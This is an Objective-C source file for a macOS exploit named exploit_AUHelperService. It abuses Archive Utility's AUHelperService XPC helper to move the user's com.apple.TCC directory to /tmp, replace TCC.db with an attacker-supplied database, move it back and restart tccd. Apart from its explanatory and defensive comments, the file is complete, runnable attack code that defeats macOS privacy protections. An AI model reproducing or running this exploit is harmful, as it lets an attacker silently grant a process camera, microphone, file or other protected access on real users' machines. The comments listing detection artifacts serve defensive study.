//
// main.m
// exploit_AUHelperService
//
// Created by mickey on 2023/6/6.
//
#import <Foundation/Foundation.h>
/// Minimal redeclaration of NSSecurityScopedURLWrapper so the compiler accepts
/// the messages sent to it in exploit_AUHelperService; no implementation is
/// provided in this file.
/// NOTE(review): presumably an Apple-private class resolved when the binary is
/// linked/loaded — confirm it is available, otherwise the alloc/init below
/// cannot work. Nothing here shows what access scope (if any) the wrapper
/// conveys; it is only passed through to the helper.
@interface NSSecurityScopedURLWrapper : NSObject <NSSecureCoding> {
}
/// Wraps `url`. Returns `id` rather than `instancetype` as declared upstream.
-(id)initWithURL:(NSURL *)url;
/// The wrapped URL.
-(NSURL *)url;
@end
/// Client-side view of the helper's XPC interface; only the single selector
/// used below is declared, and NSXPCInterface is built from this protocol.
/// The helper receives caller-supplied `from`/`into` URLs, an optional
/// `baseName`, and a security-scoped wrapper, and is expected to carry out the
/// move on the caller's behalf, replying asynchronously with a wrapper for the
/// result.
/// NOTE(review): from this side it is not visible whether the helper binds
/// `from`/`into` to the scope of `wrapper` before moving; the sequence in
/// exploit_AUHelperService relies on the move being performed exactly as
/// requested. A hardened helper would need to validate the URLs against the
/// wrapper it was handed rather than trusting them as given — confirm against
/// the service implementation.
@protocol AUHelperServiceProtocol
-(void) moveWithUniquingFrom:(NSURL *)from into:(NSURL *)into baseName:(NSString *)baseName sourceWrapper:(NSSecurityScopedURLWrapper *)wrapper withReply:(void (^)(NSSecurityScopedURLWrapper *))reply;
@end
/// Drives the AUHelperService XPC service to replace the user's TCC database
/// with `payload`, the path given as argv[1].
///
/// Flow, chained through two asynchronous XPC reply blocks:
///   1. ask the helper to move ~/Library/Application Support/com.apple.TCC
///      into /tmp;
///   2. in the first reply, delete TCC.db inside the moved directory and
///      rename() `payload` over it;
///   3. ask the helper to move /tmp/com.apple.TCC back into
///      ~/Library/Application Support;
///   4. in the second reply, stop and start com.apple.tccd via launchctl.
/// getchar() at the end keeps the process alive until the replies have run.
///
/// No return value; every file-system and XPC step is fire-and-forget — the
/// results of unlink(), rename() and system() are not checked, and there is no
/// error path if the helper rejects or fails a move.
///
/// Defensive note: the privilege-relevant step is that a separate helper
/// process performs the directory moves for the caller. The observable
/// artifacts of this sequence are the com.apple.TCC directory transiting /tmp,
/// its TCC.db being unlinked and renamed over, and a launchctl stop/start of
/// com.apple.tccd from an unrelated process.
void exploit_AUHelperService(const char *payload) {
// Ad-hoc prototype for a function not defined in this file.
// NOTE(review): the name and the bundle-path argument suggest it registers the
// XPC service bundle so that the service-name lookup below resolves — confirm;
// the meaning of the second argument (2) is not visible here.
void xpc_add_bundle(char *, int);
xpc_add_bundle("/System/Library/CoreServices/Applications/Archive Utility.app/Contents/XPCServices/AUHelperService.xpc", 2);
// Connect by service name and expose the one-method protocol declared above.
NSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.archiveutility.auhelperservice"];
conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(AUHelperServiceProtocol)];
// Both handlers only log; an interrupted/invalidated connection leaves the
// reply chain below silently unfinished.
[conn setInterruptionHandler:^{
NSLog(@"connection interrupted!");
}];
[conn setInvalidationHandler:^{
NSLog(@"connection invalidated!");
}];
[conn resume];
// __block is not required on any of these: they are only read inside the
// reply blocks, never reassigned. Harmless, but misleading.
__block id proxy = [conn remoteObjectProxy];
__block const char *payload_db = payload;
// Source directory (the user's TCC store) and its parent; the parent is the
// destination of the second move.
NSURL *targetURL = [NSURL fileURLWithPath:[NSHomeDirectory() stringByAppendingPathComponent:@"Library/Application Support/com.apple.TCC"]];
__block NSURL *targetDirURL = [NSURL fileURLWithPath:[NSHomeDirectory() stringByAppendingPathComponent:@"Library/Application Support"]];
// Where the directory lands after the first move, and its parent (the
// destination of the first move).
__block NSURL *tmpURL = [NSURL fileURLWithPath:@"/tmp/com.apple.TCC"];
NSURL *tmpDirURL = [NSURL fileURLWithPath:@"/tmp"];
// The same /tmp wrapper is passed as `sourceWrapper` for both moves, even
// though the source of the first move is under the home directory.
__block NSSecurityScopedURLWrapper *tmpDirWrapper = [[NSSecurityScopedURLWrapper alloc]initWithURL:tmpDirURL];
NSLog(@"moving from %@ to %@", targetURL, tmpDirURL);
// Move 1: com.apple.TCC -> /tmp. baseName is nil, so the helper presumably
// keeps the original directory name (the hard-coded /tmp/com.apple.TCC path
// below depends on that) — confirm.
[proxy moveWithUniquingFrom:targetURL into:tmpDirURL baseName:nil sourceWrapper:tmpDirWrapper withReply:^(NSSecurityScopedURLWrapper *resultWrapper) {
NSLog(@"result wrapper1:%@", resultWrapper);
NSLog(@"modifying the user's TCC.db");
// Swap the database inside the moved directory. Return values are ignored:
// a failed unlink (e.g. the move did not happen) or a failed rename
// (rename() fails across filesystems, so `payload` must be on the same
// volume as /tmp) still proceeds to move 2.
unlink("/tmp/com.apple.TCC/TCC.db");
rename(payload_db, "/tmp/com.apple.TCC/TCC.db");
NSLog(@"moving from %@ to %@", tmpURL, targetDirURL);
// Move 2: /tmp/com.apple.TCC -> back under ~/Library/Application Support.
[proxy moveWithUniquingFrom:tmpURL into:targetDirURL baseName:nil sourceWrapper:tmpDirWrapper withReply:^(NSSecurityScopedURLWrapper *resultWrapper) {
NSLog(@"result wrapper2:%@", resultWrapper);
NSLog(@"restarting the user's tccd process...");
// system() runs each command through the shell; the arguments are fixed
// literals, so there is no injection surface here, but exit statuses are
// not checked.
system("launchctl stop com.apple.tccd");
system("launchctl start com.apple.tccd");
NSLog(@"all done.");
}];
}];
// Block on stdin so the asynchronous replies above get to run. Sending input
// before the second reply returns would presumably abandon the chain with the
// directory still in /tmp.
getchar();
}
/// Entry point. Expects exactly one argument, the path of the prepared TCC.db
/// handed to exploit_AUHelperService; any other argument count prints the
/// usage line and returns -1.
int main(int argc, const char * argv[]) {
    if (argc == 2) {
        exploit_AUHelperService(argv[1]);
        return 0;
    }
    NSLog(@"Usage: %s /path/to/payload_TCC.db", argv[0]);
    return -1;
}